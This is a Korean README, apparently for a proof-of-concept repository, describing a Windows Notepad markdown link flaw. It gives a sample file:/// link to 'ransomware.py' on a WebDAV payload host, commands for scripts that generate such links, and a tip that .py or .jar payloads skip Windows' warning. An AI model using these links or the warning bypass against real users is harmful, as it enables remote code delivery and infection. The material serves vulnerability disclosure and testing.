
"Windows Notepad RCE"에 대한 PoC
PoC of the "Windows Notepad RCE" vulnerability.
이 "취약점"은 간단합니다. Windows 메모장의 마크다운 엔진은 잘 알려지지 않은 URL 프로토콜을 신경 쓰지 않습니다. 악성코드 분석가로서 저는 WebDAV 및 SMB 기반 페이로드 배포에 대한 많은 보고서를 읽었습니다. 이 문서에서 file:/// 프로토콜을 악용하여 WebDAV/SMB 서버의 파일을 가리키는 URL을 만들 수 있습니다.
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
두 개의 스크립트를 만들었습니다. 하나는 Node.js용이고 다른 하나는 Python용입니다. 둘 다 WebDAV 페이로드를 가리키는 마크다운 파일을 생성합니다. sample-payloads 폴더에 있는 예제 페이로드를 사용할 수 있습니다.
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
출력 파일(poc.md)은 현재 디렉터리에 생성됩니다.
대부분의 페이로드 파일 확장자(예: .exe, .lnk, .vbs, ...)는 메모장 앱이 취약함에도 불구하고 여전히 기본 제공 경고를 트리거합니다. 이 경고는 Windows 자체에서 발생합니다. 제가 테스트한 것 중 기본 OOB 설치에서 코드 실행으로 이어질 수 있는 모든 것은 이 필수 경고를 표시합니다.

대상 장치에 Python 또는 Java가 설치되어 있으면 .py 또는 .jar 페이로드를 사용하여 경고 팝업을 우회할 수 있습니다.

이제 링크를 클릭하면 새로운 팝업 경고가 표시됩니다.
취약한 버전의 Windows 메모장은 Uptodown에서 찾을 수 있습니다. 설치 프로그램의 디지털 서명을 확인하고 Microsoft의 서명인지 확인하세요. 또한 이 PoC는 VM에서만 테스트해야 합니다.
안전하게 지내시고 즐기세요!